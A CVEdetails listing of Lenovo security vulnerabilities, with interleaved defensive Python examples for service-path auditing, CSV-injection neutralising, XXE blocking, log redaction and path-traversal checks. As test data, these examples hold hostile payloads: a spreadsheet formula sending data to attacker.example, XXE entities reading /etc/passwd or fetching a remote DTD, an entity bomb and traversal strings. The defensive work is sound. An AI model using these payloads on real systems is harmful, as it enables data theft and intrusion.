CVEdetails.com the ultimate security vulnerability data source

Lenovo : Security Vulnerabilities

Each entry below spans four lines: (1) #, CVE ID, CWE ID, # of Exploits (blank when none are listed), Vulnerability Type(s), Publish Date, Update Date; (2) CVSS v2 base score; (3) Gained Access, Access (Local/Remote), Complexity, Authentication, Conf., Integ., Avail.; (4) description.
1 CVE-2021-3417 319 2021-03-09 2021-03-15
4.0
None Remote Low Single system Partial None None
An internal product security audit of LXCO, prior to version 1.2.2, discovered that credentials for Lenovo XClarity Administrator (LXCA), if added as a Resource Manager, are encoded then written to an internal LXCO log file each time a session is established with LXCA. Affected logs are captured in the First Failure Data Capture (FFDC) service log. The FFDC service log is only generated when requested by a privileged LXCO user and it is only accessible to the privileged LXCO user that requested the file.
2 CVE-2020-8357 276 DoS 2021-03-09 2021-03-12
2.1
None Local Low Not required None None Partial
A denial of service vulnerability was reported in Lenovo PCManager, prior to version 3.0.200.2042, that could allow configuration files to be written to non-standard locations.
3 CVE-2020-8356 319 2021-03-09 2021-03-15
4.0
None Remote Low Single system Partial None None
An internal product security audit of LXCO, prior to version 1.2.2, discovered that optional passwords, if specified, for the Syslog and SMTP forwarders are written to an internal LXCO log file in clear text. Affected logs are captured in the First Failure Data Capture (FFDC) service log. The FFDC service log is only generated when requested by a privileged LXCO user and it is only accessible to the privileged LXCO user that requested the file.
4 CVE-2020-8355 319 2021-02-10 2021-02-17
4.0
None Remote Low Single system Partial None None
An internal product security audit of Lenovo XClarity Administrator (LXCA) prior to version 3.1.0 discovered the Windows OS credentials provided by the LXCA user to perform driver updates of managed systems may be captured in the First Failure Data Capture (FFDC) service log if the service log is generated while managed endpoints are updating. The service log is only generated when requested by a privileged LXCA user and it is only accessible to the privileged LXCA user that requested the file and is then deleted.
5 CVE-2020-8351 269 Exec Code 2020-11-30 2020-12-02
4.6
None Local Low Not required Partial Partial Partial
A privilege escalation vulnerability was reported in Lenovo PCManager prior to version 3.0.50.9162 that could allow an authenticated user to execute code with elevated privileges.
6 CVE-2020-8348 79 Exec Code XSS 2020-09-24 2020-09-30
4.3
None Remote Medium Not required None Partial None
A DOM-based cross-site scripting (XSS) vulnerability was reported in Lenovo Enterprise Network Disk prior to version 6.1 patch 6 hotfix 4 that could allow execution of code in an authenticated user's current browser session if a crafted url is visited, possibly through phishing.
7 CVE-2020-8347 79 Exec Code XSS 2020-09-24 2020-09-30
4.3
None Remote Medium Not required None Partial None
A reflective cross-site scripting (XSS) vulnerability was reported in Lenovo Enterprise Network Disk prior to version 6.1 patch 6 hotfix 4 that could allow execution of code in an authenticated user's browser if a crafted url is visited, possibly through phishing.
8 CVE-2020-8346 276 DoS 2020-09-15 2020-09-21
2.1
None Local Low Not required None None Partial
A denial of service vulnerability was reported in the Lenovo Vantage component called Lenovo System Interface Foundation prior to version 1.1.19.5 that could allow configuration files to be written to non-standard locations.
9 CVE-2020-8345 427 2020-10-14 2020-10-26
4.4
None Local Medium Not required Partial Partial Partial
A DLL search path vulnerability was reported in the Lenovo HardwareScan Plugin for the Lenovo Vantage hardware scan feature prior to version 1.0.46.11 that could allow escalation of privilege.
10 CVE-2020-8342 367 2020-09-15 2020-09-21
6.9
None Local Medium Not required Complete Complete Complete
A race condition vulnerability was reported in Lenovo System Update prior to version 5.07.0106 that could allow escalation of privilege.
11 CVE-2020-8338 426 Exec Code 2020-10-14 2020-10-16
7.2
None Local Low Not required Complete Complete Complete
A DLL search path vulnerability was reported in Lenovo Diagnostics prior to version 4.35.4 that could allow a user with local access to execute code on the system.
12 CVE-2020-8327 269 Exec Code 2020-04-14 2020-04-15
7.2
None Local Low Not required Complete Complete Complete
A privilege escalation vulnerability was reported in LenovoBatteryGaugePackage for Lenovo System Interface Foundation bundled in Lenovo Vantage prior to version 10.2003.10.0 that could allow an authenticated user to execute code with elevated privileges.
13 CVE-2020-8326 428 Exec Code 2020-07-24 2020-07-29
6.9
None Local Medium Not required Complete Complete Complete
An unquoted service path vulnerability was reported in Lenovo Drivers Management prior to version 2.7.1128.1046 that could allow an authenticated user to execute code with elevated privileges.
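What an unquoted service path actually exposes is the lookup order: when the path to the service binary contains spaces and is not quoted, the process loader tries each space-delimited prefix (with .exe appended) before it reaches the intended file, so a file planted at one of those earlier paths runs as the service account. The following is an added example, not Lenovo code or tooling; the service names and ImagePath strings are constructed, and the helper names (lookup_candidates, hijack_points, audit) are this example's own.

```python
"""Enumerate the binaries Windows would try to start for an unquoted service path.

Added example, not Lenovo's code or tooling. The service entries below are
constructed; on a real host the same strings come from
HKLM\\SYSTEM\\CurrentControlSet\\Services\\<name>\\ImagePath.
"""
from typing import Dict, List

# Constructed sample ImagePath values (hypothetical service names and paths).
SAMPLE_SERVICES: Dict[str, str] = {
    "GoodSvc": '"C:\\Program Files\\Vendor\\Good Service\\svc.exe" -run',
    "BadSvc": "C:\\Program Files\\Vendor\\Drivers Management\\svc.exe -run",
    "SysSvc": "C:\\Windows\\system32\\svchost.exe -k netsvcs",
    "NoSpace": "C:\\Vendor\\svc.exe",
}


def lookup_candidates(image_path: str) -> List[str]:
    """Paths the service control manager (via CreateProcess) tries, in order.

    A quoted path is unambiguous. For an unquoted path containing spaces,
    CreateProcess tries each space-delimited prefix as an executable,
    appending .exe where the prefix has no extension, and runs the first
    file that exists. Enumeration stops at the first prefix that already
    names an .exe (the binary the vendor intended); if no prefix does,
    every prefix is listed.
    """
    image_path = image_path.strip()
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        return [image_path[1:end]] if end > 0 else []
    tokens = image_path.split(" ")
    candidates: List[str] = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates


def hijack_points(image_path: str) -> List[str]:
    """Files an attacker could plant to be executed instead of the real service binary."""
    return lookup_candidates(image_path)[:-1]


def audit(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each service with an unquoted, space-containing path to its hijack points."""
    flagged: Dict[str, List[str]] = {}
    for name, image_path in services.items():
        points = hijack_points(image_path)
        if points:
            flagged[name] = points
    return flagged


if __name__ == "__main__":
    for name, points in audit(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path; candidates tried before the real binary:")
        for p in points:
            print(f"    {p}")
```

Whether a listed candidate is exploitable depends on the ACL of its parent directory (C:\ and C:\Program Files are writable only by administrators by default; vendor subdirectories often are not so strict) and on the account the service runs as. The fix on the vendor side is to quote the path in the ImagePath value; on a live host the same strings can be read from the Services registry key and fed to audit().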
14 CVE-2020-8324 20 2020-04-14 2020-04-15
2.1
None Local Low Not required None Partial None
A vulnerability was reported in LenovoAppScenarioPluginSystem for Lenovo System Interface Foundation prior to version 1.2.184.31 that could allow unsigned DLL files to be executed.
15 CVE-2020-8319 269 Exec Code 2020-04-14 2020-04-15
7.2
None Local Low Not required Complete Complete Complete
A privilege escalation vulnerability was reported in Lenovo System Interface Foundation prior to version 1.1.19.3 that could allow an authenticated user to execute code with elevated privileges.
16 CVE-2020-8318 269 Exec Code 2020-04-14 2020-04-15
7.2
None Local Low Not required Complete Complete Complete
A privilege escalation vulnerability was reported in the LenovoSystemUpdatePlugin for Lenovo System Interface Foundation prior to version that could allow an authenticated user to execute code with elevated privileges.
17 CVE-2020-8317 426 Exec Code 2020-07-24 2020-07-29
6.9
None Local Medium Not required Complete Complete Complete
A DLL search path vulnerability was reported in Lenovo Drivers Management prior to version 2.7.1128.1046 that could allow an authenticated user to execute code with elevated privileges.
18 CVE-2020-8316 200 +Info 2020-04-14 2020-04-15
2.1
None Local Low Not required Partial None None
A vulnerability was reported in Lenovo Vantage prior to version 10.2003.10.0 that could allow an authenticated user to read files on the system with elevated privileges.
19 CVE-2019-19757 79 Exec Code XSS 2020-02-14 2020-02-24
3.5
None Remote Medium Single system None Partial None
An internal product security audit of Lenovo XClarity Administrator (LXCA) discovered a Document Object Model (DOM) based cross-site scripting vulnerability in versions prior to 2.6.6 that could allow JavaScript code to be executed in the user's web browser if a specially crafted link is visited. The JavaScript code is executed on the user's system, not executed on LXCA itself.
20 CVE-2019-19756 532 2020-03-13 2020-03-18
3.6
None Local Low Not required Partial Partial None
An internal product security audit of Lenovo XClarity Administrator (LXCA) discovered Windows OS credentials, used to perform driver updates of managed systems, being written to a log file in clear text. This only affects LXCA version 2.6.0 when performing a Windows driver update. Affected logs are only accessible to authorized users in the First Failure Data Capture (FFDC) service log and log files on LXCA.
21 CVE-2019-6196 426 2020-06-09 2020-06-22
6.9
None Local Medium Not required Complete Complete Complete
A symbolic link vulnerability in some Lenovo installation packages, prior to version 1.2.9.3, could allow privileged file operations during file extraction and installation.
22 CVE-2019-6194 611 2020-02-14 2020-02-21
4.3
None Remote Medium Not required Partial None None
An XML External Entity (XXE) processing vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.6.6 that could allow information disclosure.
23 CVE-2019-6193 200 +Info 2020-02-14 2020-02-24
5.0
None Remote Low Not required Partial None None
An information disclosure vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.6.6 that could allow unauthenticated access to some configuration files which may contain usernames, license keys, IP addresses, and encrypted password hashes.
24 CVE-2019-6191 2019-11-20 2020-08-24
4.6
None Local Low Not required Partial Partial Partial
A potential vulnerability in the discontinued LenovoPaper software version 1.0.0.22 may allow local privilege escalation.
25 CVE-2019-6189 426 2019-11-20 2019-11-22
4.4
None Local Medium Not required Partial Partial Partial
A potential vulnerability was reported in Lenovo System Interface Foundation versions before v1.1.18.3 that could allow an administrative user to load an unsigned DLL.
26 CVE-2019-6186 Exec Code 2019-11-20 2019-11-22
6.5
None Remote Low Single system Partial Partial Partial
A potential vulnerability was reported in Lenovo System Interface Foundation versions before v1.1.18.3 that could allow an authenticated user to execute code as another user.
27 CVE-2019-6184 2019-11-20 2020-08-24
4.6
None Local Low Not required Partial Partial Partial
A potential vulnerability in the discontinued Customer Engagement Service (CCSDK) software version 2.0.21.1 may allow local privilege escalation.
28 CVE-2019-6183 DoS 2019-12-10 2020-08-24
7.8
None Remote Low Not required None None Complete
A denial of service vulnerability has been reported in Lenovo Energy Management Driver for Windows 10 versions prior to 15.11.29.7 that could cause systems to experience a blue screen error. Lenovo Energy Management is a client utility. Lenovo XClarity Energy Manager is not affected.
29 CVE-2019-6182 1236 2019-09-03 2020-08-24
4.0
None Remote Low Single system None Partial None
A stored CSV Injection vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.5.0 that could allow an administrative user to store malformed data in LXCA Jobs and Event Log data, that could result in crafted formulas stored in an exported CSV file. The crafted formula is not executed on LXCA itself.
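The point of a stored CSV injection is that the data is inert on the server and only becomes a formula when an administrator opens the exported file in a spreadsheet, so the export path is where neutralisation belongs (with an optional reject-or-flag check at store time). The following is an added example, not LXCA code; the event rows are constructed to resemble a jobs/event-log export, the payloads are the standard formula-injection shapes, and the helper names are this example's own.

```python
"""Neutralise spreadsheet-formula injection in a CSV export.

Added example, not LXCA code. The event rows are constructed to look like a
jobs/event-log export; the payloads are the classic CSV-injection shapes.
"""
import csv
import io
from typing import Any, Dict, Iterable, List

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula,
# plus tab and CR, which can smuggle a new cell onto the line. "+" and "-" are
# included because payloads such as "-2+3+cmd|' /C calc'!A0" start that way.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: Any) -> bool:
    """True for strings a spreadsheet would evaluate when the file is opened."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: Any) -> Any:
    """Prefix formula-like strings with a single quote so the cell stays text.

    Non-string values (numbers, None) pass through unchanged, so numeric
    columns keep their type; only free-text fields are affected.
    """
    if is_formula_like(value):
        return "'" + value
    return value


def export_csv(rows: Iterable[Dict[str, Any]], fieldnames: List[str]) -> str:
    """Write rows as CSV with every cell neutralised and quoted."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k)) for k in fieldnames})
    return buf.getvalue()


def roundtrip(rows: Iterable[Dict[str, Any]], fieldnames: List[str]) -> List[Dict[str, str]]:
    """Export and read back, which is what a spreadsheet would see cell by cell."""
    return list(csv.DictReader(io.StringIO(export_csv(rows, fieldnames))))


def flagged_inputs(rows: Iterable[Dict[str, Any]]) -> List[Any]:
    """Store-time companion check: values worth rejecting or logging before they are saved."""
    return [v for row in rows for v in row.values() if is_formula_like(v)]


# Constructed sample: what an administrative user could have stored in job/event data.
SAMPLE_EVENTS = [
    {"job": "Firmware update", "message": "Completed", "duration_s": 42},
    {"job": '=HYPERLINK("http://attacker.example/?"&A1,"Open report")',
     "message": "@SUM(1+1)", "duration_s": 1},
    {"job": "Backup", "message": "-5 degrees reported by sensor 3", "duration_s": 7},
]
FIELDS = ["job", "message", "duration_s"]

if __name__ == "__main__":
    print(export_csv(SAMPLE_EVENTS, FIELDS))
    print(flagged_inputs(SAMPLE_EVENTS))
```

The trade-off is visible in the third row: treating a leading "-" as a trigger also quotes legitimate text such as a negative reading, which is why numeric data should be exported as numbers rather than strings, and why the quote prefix (which the spreadsheet hides) is preferred over dropping the value.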
30 CVE-2019-6181 79 Exec Code XSS 2019-09-03 2019-10-09
4.3
None Remote Medium Not required None Partial None
A reflected cross-site scripting (XSS) vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.5.0 that could allow a crafted URL, if visited, to cause JavaScript code to be executed in the user's web browser. The JavaScript code is not executed on LXCA itself.
31 CVE-2019-6180 79 Exec Code XSS 2019-09-03 2019-10-09
3.5
None Remote Medium Single system None Partial None
A stored cross-site scripting (XSS) vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.5.0 that could allow an administrative user to cause JavaScript code to be stored in LXCA which may then be executed in the user's web browser. The JavaScript code is not executed on LXCA itself.
32 CVE-2019-6179 611 2019-09-03 2019-10-09
5.0
None Remote Low Not required Partial None None
An XML External Entity (XXE) processing vulnerability was reported in Lenovo XClarity Administrator (LXCA) prior to version 2.5.0, Lenovo XClarity Integrator (LXCI) for Microsoft System Center prior to version 7.7.0, and Lenovo XClarity Integrator (LXCI) for VMware vCenter prior to version 6.1.0 that could allow information disclosure.
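Both XXE entries above (CVE-2019-6194 and CVE-2019-6179) come down to a parser that honours DTD entity declarations in untrusted input. A parser-independent defence is to refuse any document that carries a DOCTYPE or an entity declaration before it reaches whichever parser the application uses; the following is an added example, not LXCA/LXCI code, that does exactly that with a throw-away expat pass. The sample documents are constructed, and the function names are this example's own.

```python
"""Refuse XML that declares a DTD or entities before handing it to any parser.

Added example, not LXCA/LXCI code. The check runs a throw-away expat pass that
aborts at the first DOCTYPE or entity declaration, so it protects whatever
downstream parser is used, including ones that resolve external entities by
default. The documents below are constructed.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when the document could trigger entity expansion or external fetches."""


def assert_no_dtd(data: bytes) -> None:
    """Abort on any DOCTYPE (external DTD or internal subset) or entity declaration."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE refused (root={name!r}, system_id={system_id!r})")

    def on_entity(entity_name, is_parameter_entity, value, base,
                  system_id, public_id, notation_name):
        raise UnsafeXML(f"entity declaration refused ({entity_name!r})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)  # an exception raised in a handler propagates out of Parse


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse only after the pre-check passes."""
    assert_no_dtd(data)
    return ET.fromstring(data)


def is_safe(data: bytes) -> bool:
    """Convenience wrapper: True when the pre-check accepts the document."""
    try:
        assert_no_dtd(data)
        return True
    except UnsafeXML:
        return False


# Constructed samples: a benign manifest and three shapes the check must refuse.
BENIGN = b'<?xml version="1.0"?><backup><host>lxca-01</host></backup>'
XXE_FILE_READ = (b'<?xml version="1.0"?>'
                 b'<!DOCTYPE backup [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                 b'<backup><host>&xxe;</host></backup>')
XXE_EXTERNAL_DTD = (b'<!DOCTYPE backup SYSTEM "http://attacker.example/evil.dtd">'
                    b'<backup><host>x</host></backup>')
BILLION_LAUGHS = (b'<!DOCTYPE lolz [<!ENTITY lol "lol">'
                  b'<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]>'
                  b'<lolz>&lol2;</lolz>')

if __name__ == "__main__":
    print(parse_untrusted(BENIGN).findtext("host"))
    for doc in (XXE_FILE_READ, XXE_EXTERNAL_DTD, BILLION_LAUGHS):
        print(is_safe(doc))
```

Refusing every DOCTYPE is deliberately blunt: it also blocks legitimate DTD use and entity-expansion denial of service (the billion-laughs sample) in one go. If the application genuinely needs DTDs, the alternative is to keep the DOCTYPE and instead disable external entity resolution in the parser itself (for example lxml's resolve_entities option, or the equivalent feature flags on Java's DocumentBuilderFactory), since several widely used parsers resolve external entities by default.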
33 CVE-2019-6177 200 +Info 2019-08-21 2019-10-09
7.5
None Remote Low Not required Partial Partial Partial
A vulnerability reported in Lenovo Solution Center version 03.12.003, which is no longer supported, could allow log files to be written to non-standard locations, potentially leading to privilege escalation. Lenovo ended support for Lenovo Solution Center and recommended that customers migrate to Lenovo Vantage or Lenovo Diagnostics in April 2018.
34 CVE-2019-6175 DoS 2019-09-26 2020-08-24
7.8
None Remote Low Not required None None Complete
A denial of service vulnerability was reported in Lenovo System Update versions prior to 5.07.0088 that could allow configuration files to be written to non-standard locations.
35 CVE-2019-6173 426 2020-06-09 2020-06-22
6.9
None Local Medium Not required Complete Complete Complete
A DLL search path vulnerability could allow privilege escalation in some Lenovo installation packages, prior to version 1.2.9.3, during installation if an attacker already has administrative privileges.
36 CVE-2019-6158 532 2019-05-03 2019-10-09
4.3
None Remote Medium Not required Partial None None
An internal product security audit of Lenovo XClarity Administrator (LXCA) discovered HTTP proxy credentials being written to a log file in clear text. This only affects LXCA when HTTP proxy credentials have been configured. This affects LXCA versions 2.0.0 to 2.3.x.
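Five entries on this page (CVE-2021-3417, CVE-2020-8356, CVE-2020-8355, CVE-2019-19756 and CVE-2019-6158) share one root cause: credentials reaching a service log, either in clear text or merely encoded. Since encoding is reversible, an "encoded" credential in a log is still a leaked one. The following is an added example, not Lenovo/LXCA/LXCO code, with two parts: a logging filter that scrubs records before they are written, and a scanner for an existing log that finds both clear-text secrets and Base64-encoded HTTP Basic tokens. The log lines, host names and credentials are constructed, and the key names the regex looks for (password, proxyPassword, secret, token and so on) are an assumption about how a log would label them.

```python
"""Keep credentials out of service logs and find the ones that already leaked.

Added example, not Lenovo/LXCA/LXCO code. The log lines and credentials below
are constructed; the key names the regex matches are an assumption.
"""
import base64
import binascii
import logging
import re
from typing import List, Optional, Tuple

# key=value or key: value pairs whose key names a secret; the value runs to the
# next whitespace or separator. Longer alternatives come first so that
# "proxyPassword" is matched whole rather than as "password".
SECRET_PAIR = re.compile(
    r'(?i)\b(proxyPassword|password|passwd|pwd|secret|token)\s*[=:]\s*([^\s,;&"]+)')
# HTTP Basic credentials: the word Basic followed by a Base64 blob.
BASIC_AUTH = re.compile(r'(?i)\bBasic\s+([A-Za-z0-9+/]{8,}={0,2})')


def redact(text: str) -> str:
    """Replace secret values and Basic tokens with a marker; keep the key names."""
    text = SECRET_PAIR.sub(lambda m: f"{m.group(1)}=<redacted>", text)
    return BASIC_AUTH.sub("Basic <redacted>", text)


class RedactingFilter(logging.Filter):
    """Attach to a handler or logger so every record is scrubbed before formatting."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = redact(record.getMessage())
        record.args = ()  # already interpolated; prevent a second % formatting pass
        return True


def filtered_message(msg: str, args: tuple) -> str:
    """Build a record the way logging does, run it through the filter, return the text."""
    record = logging.LogRecord("example", logging.INFO, "example.py", 1, msg, args, None)
    RedactingFilter().filter(record)
    return record.getMessage()


def basic_token_user(token: str) -> Optional[str]:
    """If token decodes to printable user:password text, return the user name."""
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" in raw and raw.isprintable():
        return raw.split(":", 1)[0]
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, kind, key or user name) for each credential found."""
    findings: List[Tuple[int, str, str]] = []
    for n, line in enumerate(lines, 1):
        for m in SECRET_PAIR.finditer(line):
            findings.append((n, "clear-text", m.group(1)))
        for m in BASIC_AUTH.finditer(line):
            user = basic_token_user(m.group(1))
            if user is not None:
                findings.append((n, "base64", user))
    return findings


# Constructed service-log lines; "lxcadmin" / "Sup3rSecret!" are made-up credentials.
SAMPLE_LOG = [
    "2021-03-01T10:00:00Z INFO  establishing session with resource manager 10.0.0.5",
    "2021-03-01T10:00:00Z DEBUG GET /sessions Authorization: Basic "
    + base64.b64encode(b"lxcadmin:Sup3rSecret!").decode("ascii"),
    "2021-03-01T10:00:01Z DEBUG smtp forwarder: host=mail.example.com password=Mailpass1",
    "2021-03-01T10:00:02Z INFO  session established",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(redact(SAMPLE_LOG[1]))
    print(filtered_message("proxy login user=%s password=%s", ("svc", "hunter2")))
```

The scanner is the check to run over a collected service log before it is attached to a support case or copied off the appliance; the filter is the fix at the source. Neither replaces rotating any credential that has already been written to a log that left the system.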
37 CVE-2018-16097 434 2018-11-30 2018-12-28
4.0
None Remote Low Single system None Partial None
LXCI for VMware versions prior to 5.5 and LXCI for Microsoft System Center versions prior to 3.5, allow an authenticated user to write to any system file due to insufficient sanitization during the upload of a certificate.
38 CVE-2018-16093 434 2018-11-30 2018-12-28
4.0
None Remote Low Single system None Partial None
In versions prior to 5.5, LXCI for VMware allows an authenticated user to write to any system file due to insufficient sanitization during the upload of a backup file.
39 CVE-2018-12169 287 Bypass 2018-09-21 2018-12-20
4.6
None Local Low Not required Partial Partial Partial
Platform sample code firmware in 4th Generation Intel Core Processor, 5th Generation Intel Core Processor, 6th Generation Intel Core Processor, 7th Generation Intel Core Processor and 8th Generation Intel Core Processor contains a logic error which may allow physical attacker to potentially bypass firmware authentication.
40 CVE-2018-9072 20 2018-11-30 2018-12-28
4.0
None Remote Low Single system Partial None None
In versions prior to 5.5, LXCI for VMware allows an authenticated user to download any system file due to insufficient input sanitization during file downloads.
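The three LXCI entries above (CVE-2018-16097, CVE-2018-16093 and CVE-2018-9072) are the two sides of one missing check: a client-supplied file name is joined to a server directory without confirming the result stays inside it, giving arbitrary file write on upload and arbitrary file read on download. The following is an added example, not LXCI code, of the confinement check; the helper names (safe_join, is_confined, demo) are hypothetical and the inputs in demo() are constructed.

```python
"""Confine a client-supplied file name to a server-side directory.

Added example, not LXCI code. The helper names are hypothetical; the inputs
exercised in demo() are constructed.
"""
import os
import pathlib
import tempfile
from typing import Dict


class PathTraversal(ValueError):
    """Raised when a supplied name would resolve outside the base directory."""


def safe_join(base: str, user_path: str) -> str:
    """Return the real path of user_path strictly inside base, or raise PathTraversal.

    Three layers, because each alone has a gap:
    1. Refuse anything absolute on either OS: a drive letter or UNC prefix is
       only "absolute" to Windows, "/etc/passwd" only to POSIX.
    2. Normalise separators and resolve the joined path with realpath, which
       collapses ".." and follows symlinks, so a link planted inside base that
       points outside is caught as well.
    3. Compare against the resolved base with a separator appended, so that
       "/srv/data2" is not accepted as lying under "/srv/data".
    """
    if "\x00" in user_path:
        raise PathTraversal("NUL byte in file name")
    normalised = user_path.replace("\\", "/")
    if (pathlib.PurePosixPath(normalised).is_absolute()
            or pathlib.PureWindowsPath(user_path).is_absolute()):
        raise PathTraversal(f"absolute path refused: {user_path!r}")
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, normalised))
    if not candidate.startswith(base_real + os.sep):
        raise PathTraversal(f"escapes base directory: {user_path!r}")
    return candidate


def is_confined(base: str, user_path: str) -> bool:
    """True when safe_join would accept user_path under base."""
    try:
        safe_join(base, user_path)
        return True
    except PathTraversal:
        return False


def demo() -> Dict[str, bool]:
    """Exercise the check against constructed inputs in a temporary base directory."""
    base = tempfile.mkdtemp(prefix="uploads-")
    os.makedirs(os.path.join(base, "backups"))
    results = {
        "backups/site-a.tgz": is_confined(base, "backups/site-a.tgz"),
        "../../etc/passwd": is_confined(base, "../../etc/passwd"),
        "/etc/passwd": is_confined(base, "/etc/passwd"),
        "..\\..\\Windows\\win.ini": is_confined(base, "..\\..\\Windows\\win.ini"),
        "C:\\Windows\\win.ini": is_confined(base, "C:\\Windows\\win.ini"),
        "backups/../../escape.txt": is_confined(base, "backups/../../escape.txt"),
        "": is_confined(base, ""),
    }
    # A symlink planted inside base that points outside must be refused too.
    link = os.path.join(base, "backups", "link")
    try:
        os.symlink(os.path.dirname(base), link)
        results["backups/link/x.txt"] = is_confined(base, "backups/link/x.txt")
    except OSError:
        results["backups/link/x.txt"] = False  # symlinks unsupported here; nothing to test
    return results


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{'accept' if accepted else 'REJECT'}  {name!r}")
```

For uploads the stronger option is to ignore the client's name entirely and store under a server-generated one; safe_join is for the cases where the supplied name must be honoured (a download by name, a backup restored by its original file name). The check runs on POSIX here; os.path handles drive letters natively on a Windows host.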
41 CVE-2018-9070 2018-07-13 2019-10-03
6.9
None Local Medium Not required Complete Complete Complete
For the Lenovo Smart Assistant Android app versions earlier than 12.1.82, an attacker with physical access to the smart speaker can, by pressing a specific button sequence, enter factory test mode and enable a web service intended for testing the device. As with most test modes, this provides extra privileges, including changing settings and running code. Lenovo Smart Assistant is an Amazon Alexa-enabled smart speaker developed by Lenovo.
42 CVE-2018-9067 2018-07-13 2019-10-03
5.0
None Remote Low Not required Partial None None
The Lenovo Help Android app versions earlier than 6.1.2.0327 had insufficient access control for some functions which, if exploited, could have led to exposure of approximately 400 email addresses and 8,500 IMEI.
43 CVE-2018-9066 20 Exec Code 2018-07-30 2019-10-03
9.0
None Remote Low Single system Complete Complete Complete
In Lenovo xClarity Administrator versions earlier than 2.1.0, an authenticated LXCA user can, under specific circumstances, inject additional parameters into a specific web API call which can result in privileged command execution within LXCA's underlying operating system.
44 CVE-2018-9065 312 2018-07-30 2019-10-03
3.5
None Remote Medium Single system Partial None None
In Lenovo xClarity Administrator versions earlier than 2.1.0, an attacker that gains access to the underlying LXCA file system user may be able to retrieve a credential store containing the service processor user names and passwords for servers previously managed by that LXCA instance, and potentially decrypt those credentials more easily than intended.
45 CVE-2018-9064 2018-07-30 2019-10-03
4.0
None Remote Low Single system Partial None None
In Lenovo xClarity Administrator versions earlier than 2.1.0, an authenticated LXCA user may abuse a web API debug call to retrieve the credentials for the System Manager user.
46 CVE-2018-9063 119 Exec Code Overflow 2018-05-04 2018-06-13
4.6
None Local Low Not required Partial Partial Partial
MapDrv (C:\Program Files\Lenovo\System Update\mapdrv.exe) in Lenovo System Update versions earlier than 5.07.0072 contains a local vulnerability where an attacker entering a very large user ID or password can overrun the program's buffer, causing undefined behaviour, such as execution of arbitrary code. No additional privilege is granted to the attacker beyond what is already possessed to run MapDrv.
47 CVE-2017-17833 119 Exec Code Overflow Mem. Corr. 2018-04-23 2020-05-15
7.5
None Remote Low Not required Partial Partial Partial
OpenSLP releases in the 1.0.2 and 1.1.0 code streams have a heap-related memory corruption issue which may manifest itself as a denial-of-service or a remote code-execution vulnerability.
48 CVE-2017-3776 200 +Info 2018-04-19 2018-05-22
5.0
None Remote Low Not required Partial None None
Lenovo Help Android mobile app versions earlier than 6.1.2.0327 allowed information to be transmitted over an HTTP channel, permitting others observing the channel to potentially see this information.
49 CVE-2017-3770 Exec Code 2017-09-22 2019-10-03
6.5
None Remote Low Single system Partial Partial Partial
Privilege escalation vulnerability in LXCA versions earlier than 1.3.2 where an authenticated user may be able to abuse certain web interface functionality to execute privileged commands within the underlying LXCA operating system.
50 CVE-2017-3764 200 +Info 2017-11-30 2017-12-20
5.0
None Remote Low Not required Partial None None
A vulnerability was identified in Lenovo XClarity Administrator (LXCA) before 1.4.0 where LXCA user account names may be exposed to unauthenticated users with access to the LXCA web user interface. No password information of the user accounts is exposed.
Total number of vulnerabilities: 111. Page 1 of 3 (this page).
CVE is a registered trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registered trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.